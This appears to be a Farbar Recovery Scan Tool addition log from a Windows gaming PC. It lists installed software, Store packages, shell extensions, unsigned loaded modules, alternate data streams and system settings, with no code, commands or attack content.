FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version: - Image-Line)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 103.0.5060.114 - Google LLC)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 103.0.1264.49 - Microsoft Corporation)
Microsoft GameInput (HKLM-x32\...\{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Version: 10.1.22621.1011 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\OneDriveSetup.exe) (Version: 22.131.0619.0001 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Version: 3.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 (HKLM\...\{010792BA-551A-3AC0-A7EF-0FAB4156C382}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 (HKLM\...\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29334 (HKLM-x32\...\{b2d0f752-adc5-496e-8f70-8669de01f746}) (Version: 14.28.29334.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.30.30704 (HKLM-x32\...\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}) (Version: 14.30.30704.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29334 (HKLM-x32\...\{14C49FC8-3E9B-4F29-8526-26629B5CF30B}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29334 (HKLM-x32\...\{0D01A812-82A1-481F-8546-8E28E976F8DF}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.30.30704 (HKLM\...\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.30.30704 (HKLM\...\{662A0088-6FCD-45DD-9EA7-68674058AED5}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{27B34E47-68AE-4802-822A-9F0C187AF84A}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox (x64 en-US) (HKLM\...\Mozilla Firefox 102.0.1 (x64 en-US)) (Version: 102.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 89.0.2 - Mozilla)
NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.2.7521.31103277 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.25.1.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.25.1.27 - NVIDIA Corporation)
NVIDIA Graphics Driver 512.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 512.59 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.39.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.39.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
NVIDIA USBC Driver 1.46.831.832 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_USBC) (Version: 1.46.831.832 - NVIDIA Corporation)
OEM Application Profile (HKLM-x32\...\{84AD2AF7-10C8-0395-66F9-FFAEB4C5DBF1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
ONN. (HKLM-x32\...\ONN.) (Version: 1.0.0.5.05 - )
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Origin (HKLM-x32\...\Origin) (Version: 10.5.113.50894 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment)
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: 1.6.0 - PCSX2 Team)
qBittorrent 4.4.2 (HKLM-x32\...\qBittorrent) (Version: 4.4.2 - The qBittorrent project)
r2modman 3.1.25 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ac231ef6-6414-5f8d-b36f-3b57705721dd) (Version: 3.1.25 - ebkr)
RestMinder version 1.0.0.1 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\{F481E04A-B87F-46D3-8FC5-A3440DE071C9}_is1) (Version: 1.0.0.1 - RestMinder)
Riot Vanguard (HKLM\...\Riot Vanguard) (Version: - Riot Games, Inc.)
Roblox Player for Miggy (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\roblox-player) (Version: - Roblox Corporation)
Spotify (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Spotify) (Version: 1.1.89.862.g94554d24 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs Desktop 1.6.4 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 1.6.4 - General Workings, Inc.)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 112.3 - Ubisoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{0BAA0A93-3AD3-4B19-9105-4C8C3FA92A83}) (Version: 2.67.0.0 - Microsoft Corporation) Hidden
Update for Windows 10 for x64-based Systems (KB4480730) (HKLM\...\{0746492E-47B6-4251-940C-44462DFD74BB}) (Version: 2.55.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{F339C545-24DC-4870-AA32-6EB6B0500B95}) (Version: 1.24.0.0 - Microsoft Corporation) Hidden
UXP WebView Support (HKLM-x32\...\UXPW_1_1_0) (Version: 1.1.0 - Adobe Inc.)
VALORANT (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Riot Game valorant.live) (Version: - Riot Games, Inc)
Vortex (HKLM\...\57979c68-f490-55b8-8fed-8b017a5af2fe) (Version: 1.5.13 - Black Tree Gaming Ltd.)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22925 - Microsoft Corporation)
Windows PC Health Check (HKLM\...\{77ACFAF7-E5AB-410D-BA14-BBEBF89422DE}) (Version: 3.1.2109.29003 - Microsoft Corporation)
Zoom (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ZoomUMX) (Version: 5.10.4 (5035) - Zoom Video Communications, Inc.)
Packages:
=========
Adobe Notification Client -> C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc [2022-04-20] (Adobe Systems Incorporated)
BreeZip -> C:\Program Files\WindowsApps\3138AweZip.AweZip_1.4.15.0_x86__ffd303wmbhcjt [2022-07-13] (BreeZip)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.13.7040.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Studios) [MS Ad]
Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.1.17.0_x64__8wekyb3d8bbwe [2022-06-08] (Microsoft Studios)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-04-26] (NVIDIA Corp.)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2022-01-07] (Microsoft Corporation)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj [2020-07-31] (Realtek Semiconductor Corp)
Visage -> C:\Program Files\WindowsApps\SadSquareStudio.Visage_1.1.0.0_x64__855q6fdw1qbrg [2022-06-22] (SadSquare Studio)
WhatsApp Desktop -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2222.12.0_x64__cv1g1gvanyjgm [2022-07-01] (WhatsApp Inc.)
Word Mobile -> C:\Program Files\WindowsApps\Microsoft.Office.Word_16001.14326.21062.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-317A81924068} -> [Creative Cloud Files] => C:\Users\Miggy\Creative Cloud Files [2020-08-04 16:40]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{2F81B25E-7507-4844-BFF2-77D2CC24CED4}\localserver32 -> C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Inc. -> Adobe Inc.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{9E121B07-D732-48C1-94D0-77C233EAE0F3} -> [MEGAsync] => C:\Users\Miggy\Documents\MEGAsync [2022-06-05 15:01]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{d1b22d3d-8585-53a6-acb3-0e803c7e8d2a}\localserver32 -> "C:\Users\Miggy\AppData\Local\Microsoft\Teams\current\Teams.exe" --toast => No File
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\nvshext.dll [2022-04-21] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2021-10-18 17:33 - 2021-09-06 12:55 - 000033792 _____ () [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Gh.Common.dll
2022-07-12 17:36 - 2021-11-11 04:03 - 001495552 _____ () [File not signed] C:\Program Files (x86)\ONN\DuiLib.dll
2022-07-12 17:36 - 2018-09-06 03:45 - 000045056 _____ () [File not signed] C:\Program Files (x86)\ONN\HookDLL.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 126965248 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libcef.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 000384000 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libegl.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 008006656 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libglesv2.dll
2021-10-18 17:33 - 2021-09-06 10:18 - 012201136 _____ () [File not signed] C:\Users\Miggy\AppData\Local\Programs\RestMinder\sdk.dll
2022-07-12 17:36 - 2019-07-18 06:35 - 000049152 _____ (0) [File not signed] C:\Program Files (x86)\ONN\CommFunc.dll
2022-07-12 17:36 - 2019-08-17 03:25 - 000119296 _____ (0) [File not signed] C:\Program Files (x86)\ONN\DrvInDll.dll
2021-10-18 17:33 - 2021-06-16 14:44 - 000117248 _____ (Countly) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Countly.dll
2021-10-18 17:33 - 2018-01-10 14:34 - 000024064 _____ (Daniel Grunwald, Omer Mor, Alex Davies, jnm2) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\AsyncBridge.Net35.dll
2021-06-27 21:31 - 2021-05-06 00:00 - 000077824 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2021-10-18 17:33 - 2018-03-24 18:44 - 000475136 _____ (Newtonsoft) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Newtonsoft.Json.dll
2021-10-18 17:33 - 2018-05-11 09:52 - 000074240 _____ (Sentry) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\SharpRaven.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 000983552 _____ (The Chromium Authors) [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\chrome_elf.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\LIBEAY32.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\ssleay32.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 002815488 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libcrypto-1_1-x64.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000678400 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libssl-1_1-x64.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001611264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005487104 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Core.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005841920 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Gui.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001179136 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Network.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000146432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005089792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000184832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Xml.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000046592 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\bearer\qgenericbearer.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 006270976 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Core.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 001389568 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Network.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000157184 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5WebSockets.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000210432 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Xml.dll
2021-09-14 00:46 - 2021-09-14 00:46 - 005979312 _____ (The Qt Company Oy -> The Qt Company Ltd.) [File not signed] C:\Users\Miggy\AppData\Local\MEGAsync\Qt5Core.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log:CCC93B07B0 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log:72C8986B20 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log_backup1:AF8AA3CDC1 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log:DE1448F4D7 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [3442]
AlternateDataStreams: C:\Users\Miggy\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Miggy\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [490]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2018-04-11 16:38 - 2018-04-11 16:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Miggy\Downloads\FXHeNR8WYAAmLXM.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
